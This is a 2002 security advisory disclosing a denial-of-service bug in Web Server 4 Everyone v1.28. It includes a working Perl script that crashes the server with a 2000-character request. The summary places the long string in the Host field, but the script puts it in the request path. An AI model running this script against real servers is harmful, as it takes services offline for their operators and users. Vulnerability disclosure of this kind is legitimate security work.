-----BEGIN PGP SIGNED MESSAGE----- Hash: MD5 - --[ Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability ]-- - --[ Type Denial of Service - --[ Release Date October 23, 2002 - --[ Product / Vendor Web Server 4 Everyone is an Internet and Intranet server that supports HTTP Services. Web Server 4 Everyone is available for Microsoft Windows operating systems. http://www.freeware.lt/Info/projects.php - --[ Summary The problem is Web Server 4 Everyone v1.28 with bounds checking, when you request 2000 characters "web4all.exe" just shuts down. This vulnerability also affects Web Server 4 Everyone versions prior to v1.28 for Microsoft Windows 2000. When the attacker send a request in size of 2000 characters in "Host:" field that contains all "127.0.0.1", the server crashes. In case you send a request that size without adding the "Host:" there is no effect on running program. The Web server must be restarted to regain normal functionality. - --[ Exploit An exploit for this vulnerability exists and is available below. =============== SNIP =============== #!/usr/bin/perl -w use IO::Socket; $host = $ARGV[0]; $port = $ARGV[1]; $evil = "A" x 2000; print "Web Server 4 Everyone v1.28 Host Field Denial of Service Vulnerability by SecurityOffice\n"; print "Usage: $0 host port\n"; print "Connecting...\n"; $socket = IO::Socket::INET-> new(Proto=>"tcp", PeerAddr=>$host, PeerPort=>$port) || die "Connection failed.\n"; print "Attacking...\n"; print $socket "GET /$evil HTTP/1.1\n Host: 127.0.0.1\n\n"; close($socket); print "\nConnection closed. Finished.\n\n"; =============== SNIP =============== - --[ Tested Windows 2000 Sp3 / Web Server 4 Everyone v1.28 Windows 98 SE / Web Server 4 Everyone v1.28 - --[ Vulnerable Web Server 4 Everyone v1.28 - --[ Vendor Status This vulnerability fixed Web Server 4 Everyone v1.32 - --[ Disclaimer http://www.securityoffice.net is not responsible for the misuse or illegal use of any of the information and/or the software listed on this security advisory. - --[ Author Tamer Sahin ts@securityoffice.net http://www.securityoffice.net All our advisories can be viewed at http://www.securityoffice.net/articles/ Please send suggestions, updates, and comments to feedback@securityoffice.net (c) 2002 SecurityOffice This Security Advisory may be reproduced and distributed, provided that this Security Advisory is not modified in any way and is attributed to SecurityOffice and provided that such reproduction and distribution is performed for non-commercial purposes. Tamer Sahin http://www.securityoffice.net -----BEGIN PGP SIGNATURE----- Version: 2.6 iQEVAwUAPbZoQfpL5ibJRTtBAQFQlgf/RK+3BewSrQX6XjB8FjWatCWlEOydKC9I TB+ULUWKgTOi31J0DFSYTkFQmTLZBt8Z08QHIA3R4KSCRdv9d7UuzkTIcETnwaxO sDih29SyjysOteW0ikNtRxjQHnZydBqa8v2YRj5iQBnJbirKsPwCL0OPKx17VWZc 9wGiL07gVYVgM7xgARdhkUwXmYLTZk19WCx0ZXBxIyDdl8wTwF9VR6dy33i5vc7C AIh5CRCS4Z0aYOHt91GF7yrsOZsjppxXMHdiBX5B/F1vJQNMJpxeEd7565NlDdV+ qBUlNkchIYeQt8jLjAlsMC6FQ/9OGrs7Y56UreB9Qj0Ky0xo8sQu+w== =0MpF -----END PGP SIGNATURE-----